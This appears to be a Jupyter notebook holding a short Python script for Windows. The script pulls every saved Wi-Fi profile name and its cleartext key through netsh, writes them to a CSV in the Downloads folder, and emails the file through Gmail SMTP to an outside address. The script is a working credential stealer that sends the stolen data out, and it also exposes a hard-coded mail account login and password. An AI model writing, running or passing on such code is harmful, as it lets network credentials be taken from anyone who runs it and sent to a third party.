In [3]:
import smtplib as smtp
import subprocess
import re
import pandas as pd
from email.message import EmailMessage

In [4]:

command_output = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output = True).stdout.decode()
profile_names = (re.findall("All User Profile     : (.*)\r", command_output))
passwords=list()
if len(profile_names) != 0:
    for name in profile_names:
        profile_info = subprocess.run(["netsh", "wlan", "show", "profile", name], capture_output = True).stdout.decode()
        if re.search("Security key           : Absent", profile_info):
            continue
        else:
            profile_info_pass = subprocess.run(["netsh", "wlan", "show", "profile", name, "key=clear"], capture_output = True).stdout.decode()
            password = re.search("Key Content            : (.*)\r", profile_info_pass)
            if password == None:
                passwords.append("None")
            else:
                passwords.append(password[1])

In [5]:
data = {
    "ID's": pd.Series(profile_names),
    "Passwords": pd.Series(passwords),
}


df = pd.DataFrame(data)
#print(df)

import getpass
username = getpass.getuser()
file_name="wifi_ids_With_passwords.csv"
first_1="C:\\Users\\"
path = first_1+username+"\\Downloads\\"+file_name
df.to_csv(path)

In [6]:
msg = EmailMessage()
msg['Subject'] = 'Dummy here'
msg['From'] = 'dummygod944@gmail.com'
msg['To'] = 'khalidfarrukh951@gmail.com'
body = "MY wifi id's and passwords "
msg.set_content(body)

In [7]:
files = [path]

for file in files:
    with open(file,'rb') as f:
        file_data=f.read()
    msg.add_attachment(file_data,maintype='application',subtype='octet-stream',filename=file_name)

In [8]:
cnc = smtp.SMTP('smtp.gmail.com',587)
sts=cnc.ehlo()
ser_s=cnc.starttls()
sts=cnc.ehlo()

ln_a=' '
if sts[0]==250 and ser_s[0] == 220:
    ln_a = cnc.login('dummygod944@gmail.com','howdy1500hi')
    if ln_a[0]==235:
        cnc.send_message(msg)
        cnc.quit()